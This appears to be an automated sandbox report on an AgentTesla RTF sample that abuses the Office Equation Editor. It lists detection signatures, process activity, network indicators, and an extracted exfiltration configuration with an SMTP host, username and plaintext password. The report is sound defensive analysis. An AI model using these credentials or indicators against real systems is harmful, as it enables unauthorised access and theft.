Edit tour

Windows Analysis Report
2FBexXRCHR.rtf

Overview

General Information

Sample name:	2FBexXRCHR.rtf renamed because original name is a hash value
Original sample name:	02e73ef6a6bde5caa7628ee916111f60.rtf
Analysis ID:	1482785
MD5:	02e73ef6a6bde5caa7628ee916111f60
SHA1:	85fcd05b810401dffc45b6c2cb831787a8a131d3
SHA256:	a74f7219f672e155f20c501b9285630b07e70922c058fa3713c29012b8cbdb8c
Tags:	rtf
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

.NET source code contains potential unpacker

Contains functionality to log keystrokes (.Net Source)

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Outbound SMTP Connections

Stores large binary data to the registry

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3160 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

winiti.exe (PID: 3392 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 3D33CBDE84D0A1197EC0D459D634473E)

winiti.exe (PID: 3468 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 3D33CBDE84D0A1197EC0D459D634473E)

EQNEDT32.EXE (PID: 3668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "25", "Host": "smtp.jlahuachem.com", "Username": "hunk.zhang@jlahuachem.com", "Password": "eGbB!FT9"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
2FBexXRCHR.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1d93:$obj2: \objdata 0x1d7f:$obj3: \objupdate 0x1d57:$obj5: \objautlink

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: winiti.exe PID: 3392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: winiti.exe PID: 3392	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: winiti.exe PID: 3468	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: winiti.exe PID: 3468	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.winiti.exe.34c5b90.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.winiti.exe.34c5b90.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.winiti.exe.34c5b90.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33021:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33093:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3311d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331af:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33219:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3328b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33321:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333b1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.winiti.exe.3489570.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.winiti.exe.3489570.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.winiti.exe.3489570.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33021:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33093:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3311d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331af:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33219:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3328b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33321:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333b1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.winiti.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.winiti.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.2.winiti.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34e21:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34e93:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34f1d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34faf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35019:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3508b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35121:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x351b1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.winiti.exe.34c5b90.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.winiti.exe.34c5b90.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.winiti.exe.34c5b90.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34e21:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x71241:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34e93:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x712b3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34f1d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x7133d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34faf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x713cf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35019:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x71439:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3508b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x714ab:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35121:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x71541:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x351b1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x715d1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.winiti.exe.3489570.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.winiti.exe.3489570.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.winiti.exe.3489570.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34e21:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x71441:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xad861:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34e93:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x714b3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xad8d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34f1d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x7153d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xad95d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34faf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x715cf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xad9ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35019:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x71639:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xada59:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3508b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x716ab:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xadacb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35121:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x71741:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xadb61:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 10 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.46.174.139, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3244, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3244, Protocol: tcp, SourceIp: 198.46.174.139, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3244, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3392, ProcessName: winiti.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3244, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3392, ProcessName: winiti.exe

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\winiti.exe, QueryName: api.ipify.org

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.224, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\AppData\Roaming\winiti.exe, Initiated: true, ProcessId: 3468, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3244, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 - Source IP: 198.46.174.139 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T06:39:08.862254+0200
SID:	2022050
Source Port:	80
Destination Port:	49163
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 - Source IP: 198.46.174.139 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T06:39:09.043752+0200
SID:	2022051
Source Port:	80
Destination Port:	49163
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2FBexXRCHR.rtf

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\winiti.exe	Avira: detection malicious, Label: HEUR/AGEN.1308749
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1308749

Found malware configuration

Source: 6.2.winiti.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "smtp.jlahuachem.com", "Username": "hunk.zhang@jlahuachem.com", "Password": "eGbB!FT9"}

Multi AV Scanner detection for submitted file

Source: 2FBexXRCHR.rtf	Virustotal: Detection: 52%			Perma Link
Source: 2FBexXRCHR.rtf	ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\winiti.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.46.174.139 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\winiti.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\winiti.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49164 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: smtp.jlahuachem.com
Source: global traffic	DNS query: name: smtp.jlahuachem.com

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
